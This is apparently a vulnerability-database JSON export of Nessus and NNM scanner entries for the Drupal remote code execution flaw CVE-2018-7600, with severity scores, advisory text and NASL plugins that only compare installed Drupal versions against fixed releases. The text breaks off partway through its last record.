Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
{"nessus": [{"lastseen": "2023-01-11T14:51:56", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.3.x < 8.3.9 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98566", "href": "https://www.tenable.com/plugins/was/98566", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:40:51", "description": "According to its self-reported version, the instance of Drupal running on the remote web server is 7.x prior to 7.58, 8.3.x prior to 8.3.9, 8.4.x prior to 8.4.6, or 8.5.x prior to 8.5.1. 
It is, therefore, affected by a remote code execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-28T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.58 / 8.3.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution Vulnerability (SA-CORE-2018-002)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_8_5_1.NASL", "href": "https://www.tenable.com/plugins/nessus/108688", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108688);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n 
script_name(english:\"Drupal 7.x < 7.58 / 8.3.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution Vulnerability (SA-CORE-2018-002)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PHP application running on the remote web server is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Drupal running\non the remote web server is 7.x prior to 7.58, 8.3.x prior to 8.3.9,\n8.4.x prior to 8.4.6, or 8.5.x prior to 8.5.1. It is, therefore,\naffected by a remote code execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2018-002\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Drupal version 7.58 / 8.3.9 / 8.4.6 / 8.5.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7600\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/28\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_keys(\"installed_sw/Drupal\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80, php:TRUE);\n\napp_info = vcf::get_app_info(app:\"Drupal\", port:port, webapp:true);\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"7.0\", \"max_version\" : \"7.57\", \"fixed_version\" : \"7.58\" },\n { \"min_version\" : \"8.3.0\", \"max_version\" : \"8.3.8\", \"fixed_version\" : \"8.3.9\" },\n { \"min_version\" : \"8.4.0\", \"max_version\" : \"8.4.5\", \"fixed_version\" : \"8.4.6\" },\n { \"min_version\" : \"8.5.0\", \"max_version\" : \"8.5.0\", \"fixed_version\" : \"8.5.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:32", "description": "Drupal Security Team reports :\n\nCVE-2018-7600: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-16T00:00:00", "type": "nessus", "title": "FreeBSD : drupal -- Drupal Core - Multiple Vulnerabilities (a9e466e8-4144-11e8-a292-00e04c1ea73d) 
(Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:drupal7", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "href": "https://www.tenable.com/plugins/nessus/109055", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2022 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109055);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"FreeBSD : drupal -- Drupal Core - Multiple Vulnerabilities (a9e466e8-4144-11e8-a292-00e04c1ea73d) (Drupalgeddon 2)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Drupal Security Team reports :\n\nCVE-2018-7600: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before\n8.4.6, and 
8.5.x before 8.5.1 allows remote attackers to execute\narbitrary code because of an issue affecting multiple subsystems with\ndefault or common module configurations.\"\n );\n # https://vuxml.freebsd.org/freebsd/a9e466e8-4144-11e8-a292-00e04c1ea73d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8ffa708c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"drupal7<7.57\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:42:31", "description": "A remote code execution vulnerability has been found in Drupal, a fully-featured content management framework. 
For additional information, please refer to the upstream advisory at https://www.drupal.org/sa-core-2018-002", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Debian DSA-4156-1 : drupal7 - security update (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4156.NASL", "href": "https://www.tenable.com/plugins/nessus/108698", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4156. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108698);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"DSA\", value:\"4156\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Debian DSA-4156-1 : drupal7 - security update (Drupalgeddon 2)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional\ninformation, please refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=894259\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2018-002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4156\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the drupal7 packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\nFor the stable distribution 
(stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"drupal7\", reference:\"7.32-1+deb8u11\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"drupal7\", reference:\"7.52-2+deb9u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:40:11", "description": "The version of Drupal installed on the remote server is 8.x prior to 8.3.9, and is affected by a flaw in the 'preHandle()' function in 'core/lib/Drupal/Core/DrupalKernel.php' that is triggered as certain parameter keys within HTTP requests are not properly sanitized. This may allow a remote attacker to execute arbitrary code. 
This issue may be exploited using multiple unspecified attack vectors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Drupal 8.x < 8.3.9 RCE", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "700228.PRM", "href": "https://www.tenable.com/plugins/nnm/700228", "sourceData": "Binary data 700228.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:40:11", "description": "The version of Drupal installed on the remote server is 8.5.x prior to 8.5.1, and is affected by a flaw in the 'preHandle()' function in 'core/lib/Drupal/Core/DrupalKernel.php' that is triggered as certain parameter keys within HTTP requests are not properly sanitized. This may allow a remote attacker to execute arbitrary code. 
This issue may be exploited using multiple unspecified attack vectors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Drupal 8.5.x < 8.5.1 RCE", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "700230.PRM", "href": "https://www.tenable.com/plugins/nnm/700230", "sourceData": "Binary data 700230.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:40:11", "description": "The version of Drupal installed on the remote server is 8.4.x prior to 8.4.6, and is affected by a flaw in the 'preHandle()' function in 'core/lib/Drupal/Core/DrupalKernel.php' that is triggered as certain parameter keys within HTTP requests are not properly sanitized. This may allow a remote attacker to execute arbitrary code. 
This issue may be exploited using multiple unspecified attack vectors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Drupal 8.4.x < 8.4.6 RCE", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "700229.PRM", "href": "https://www.tenable.com/plugins/nnm/700229", "sourceData": "Binary data 700229.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:40:12", "description": "The version of Drupal installed on the remote server is 7.x prior to 7.58, and is affected by a flaw in the 'preHandle()' function in 'core/lib/Drupal/Core/DrupalKernel.php' that is triggered as certain parameter keys within HTTP requests are not properly sanitized. This may allow a remote attacker to execute arbitrary code. 
This issue may be exploited using multiple unspecified attack vectors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.58 RCE", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 